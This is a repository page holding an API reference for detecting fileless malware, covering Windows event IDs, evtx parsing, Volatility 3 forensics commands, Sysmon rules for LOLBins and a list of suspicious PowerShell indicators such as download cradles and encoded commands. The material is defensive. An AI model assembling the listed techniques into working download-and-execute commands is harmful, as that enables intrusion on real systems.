creator/Anthropic-Cybersecurity-Skills
1
0
Fork 0
mirror of https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git synced 2026-06-11 21:54:56 +03:00
Code Issues Packages Projects Releases Wiki Activity
Files
c15f73db46149587e31df83c2f9d92a3b578ef21
Anthropic-Cybersecurity-Skills/skills/detecting-fileless-malware-techniques/references/api-reference.md
T
mukul975 27c6414ca5 Add folder anatomy (scripts/agent.py + references/api-reference.md) for 648 cybersecurity skills 
Complete skill folder anatomy across all cybersecurity skills:
- scripts/agent.py: 80-150 line Python agents using real libraries (impacket,
  boto3, azure-mgmt-*, kubernetes, pefile, yara, scapy, shodan, stix2, etc.)
- references/api-reference.md: real API documentation with method signatures
- LICENSE: MIT license for all skill folders
2026-03-10 21:02:12 +01:00

2.3 KiB
Raw Blame History

Fileless Malware Detection API Reference

Windows Event IDs for Fileless Detection

Event ID Log Description
4104 PowerShell Operational Script Block Logging (full script content)
4103 PowerShell Operational Module Logging
1 Sysmon Process Creation with command line
8 Sysmon CreateRemoteThread (injection)
10 Sysmon ProcessAccess (injection prep)
19/20/21 Sysmon WMI Event Filter/Consumer/Binding
7045 System New service installed

python-evtx - Parse Windows Event Logs

import Evtx.Evtx as evtx

with evtx.Evtx("Security.evtx") as log:
    for record in log.records():
        xml = record.xml()
        if "<EventID>4104</EventID>" in xml:
            print(record.timestamp(), xml[:500])

Volatility 3 Commands

# Detect injected code (RWX memory, PE headers in non-image VADs)
vol3 -f memory.dmp windows.malfind

# List processes
vol3 -f memory.dmp windows.pslist

# Scan for hidden processes
vol3 -f memory.dmp windows.psscan

# List loaded DLLs
vol3 -f memory.dmp windows.dlllist --pid 1234

# Extract injected code
vol3 -f memory.dmp windows.malfind --dump --pid 1234

LOLBins Detection Patterns (Sysmon)

<!-- Sysmon config for LOLBin monitoring -->
<RuleGroup groupRelation="or">
  <ProcessCreate onmatch="include">
    <Image condition="end with">mshta.exe</Image>
    <Image condition="end with">regsvr32.exe</Image>
    <Image condition="end with">certutil.exe</Image>
    <Image condition="end with">wmic.exe</Image>
    <Image condition="end with">cmstp.exe</Image>
    <Image condition="end with">msbuild.exe</Image>
  </ProcessCreate>
</RuleGroup>

Suspicious PowerShell Indicators

-enc / -EncodedCommand    → Base64-encoded command
IEX / Invoke-Expression   → Dynamic code execution
Net.WebClient             → Download cradle
DownloadString()          → Remote script fetch
Reflection.Assembly       → Reflective .NET loading
VirtualAlloc              → Shellcode allocation
FromBase64String          → Payload decoding

WMI Persistence Check

# List WMI event subscriptions
Get-WMIObject -Namespace root\Subscription -Class __EventFilter
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding
Reference in New Issue View Git Blame Copy Permalink